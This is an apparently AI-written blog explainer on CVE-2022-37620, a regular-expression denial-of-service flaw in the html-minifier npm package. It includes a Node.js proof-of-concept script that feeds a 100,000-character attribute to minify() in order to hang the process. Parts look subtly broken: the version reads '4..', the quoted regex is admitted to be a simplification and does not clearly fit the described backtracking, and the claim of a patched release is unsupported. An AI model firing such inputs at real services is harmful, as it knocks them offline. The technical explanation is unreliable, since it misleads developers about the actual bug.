In August 2022, CVE-2022-37620 brought attention to a critical Denial of Service vulnerability in the popular kangax/html-minifier tool. This bug didn’t require advanced cyber trickery or deep system access—just a cleverly formed input and a regular expression that was a bit too greedy for its own good. Let’s walk through what made this ReDoS (Regular Expression Denial of Service) hole possible and see how a few lines of input could bring your Node.js process to a crawl.

What Is html-minifier?

html-minifier is an npm module used by thousands to shrink HTML files for web performance. It cleans up comments, whitespace, and sometimes JavaScript/CSS blended into the markup. You run html-minifier before shipping work to production.

The Flaw: Where It Lurks

The bug affects version 4.. of html-minifier—other versions may be susceptible, but this was the one most discussed.

The problem centers on a variable called candidate in htmlminifier.js. This variable is sent through a regular expression during the minification process. If the input is maliciously crafted, this regex can keep your CPU busy for tens of seconds or even minutes, applying backtracking and burning server cycles as it tries to make sense of the input.

The Vulnerable Code (Simplified View)

Inside the package, logic similar to this is present (this is a simplified snippet to show the problem):

// htmlminifier.js

function minify(html) {
  // Imagine 'candidate' gets a string from the HTML being processed
  var candidate = getTagContent(html); // just an example
  
  // The vulnerable regex
  // This is a dramatic simplification:
  var regex = /([^\s]+)\s*=(["'])(.*?)\2/g;
  var match;
  while ((match = regex.exec(candidate)) !== null) {
    // do something with match
  }
}


The trouble comes in the regular expression: ([^\s]+)\s*=([\"'])(.*?)\2. When given a long string without spaces and certain patterns, the regex engine may struggle, going through thousands or millions of possible match combos.

Triggering the ReDoS

The key to triggering this bug is to provide an input that causes excessive backtracking. Here’s a minimal real-world example in Node.js:

const minifier = require('html-minifier');
const fs = require('fs');

// Create malicious HTML input with a ridiculously long attribute string
const attackString = '<div ' + 'a'.repeat(100000) + '="x"></div>';

try {
    // This call will hang for a long time or hog the CPU
    minifier.minify(attackString, {
        collapseWhitespace: true
    });
    console.log('No hang detected');
} catch (e) {
    console.error('Error:', e);
}


If you run this (please do so only in a safe test environment), you’ll find your Node.js process using 100% CPU—or worse, blocking and going unresponsive.

Why Does This Happen?

When a regex isn’t carefully written and the input is crafted to exploit its structure, modern regex engines may enter catastrophic backtracking—endlessly trying combinations to find a match that won’t ever exist. Some regex libraries have “safe” timeouts; most JavaScript environments do not. This is an infamous attack vector: ReDoS.

In html-minifier, ([^\s]+)\s*=([\"'])(.*?)\2 is trying to greedily match "attribute=value" pairs. But when candidate is crafted to have tens of thousands of identical, unbreakable characters (with repeating ‘a’s, for example) before an equals sign, the regex engine chokes.

References

- GitHub Security Advisory
- CVE Record on NVD
- Original html-minifier on GitHub
- OWASP: Regular Expression Denial of Service - ReDoS

Exploit in Plain Terms

1. Attacker crafts HTML with an extremely long attribute name (could be hundreds of thousands of characters).
2. Attacker sends the HTML to an application/server using html-minifier on their inputs (think web build tools, on-the-fly HTML optimizers, or server-side renderers).

How to Fix or Defend

- Update html-minifier! Latest releases have fixed this regex and added input validation.

Conclusion

CVE-2022-37620 serves as a reminder that regular expressions, while powerful, can be dangerous if misused, especially in open-source software used at scale. Tiny mistakes in regex can open doors for attackers to bring production systems to a grinding halt.

If you’re maintaining a web service or static site toolchain using html-minifier, update now and scan your dependency trees. It’s easier to fix a vulnerable regex than it is to explain why your site was down for hours!

Stay safe, and treat complex regexes with respect!

*Exclusive guide by AI Assistant. Feel free to share or cite with a link to the CVE and original project. For more in-depth security posts, follow this space!*

Timeline

Published on: 10/31/2022 12:15:00 UTC
Last modified on: 11/01/2022 17:59:00 UTC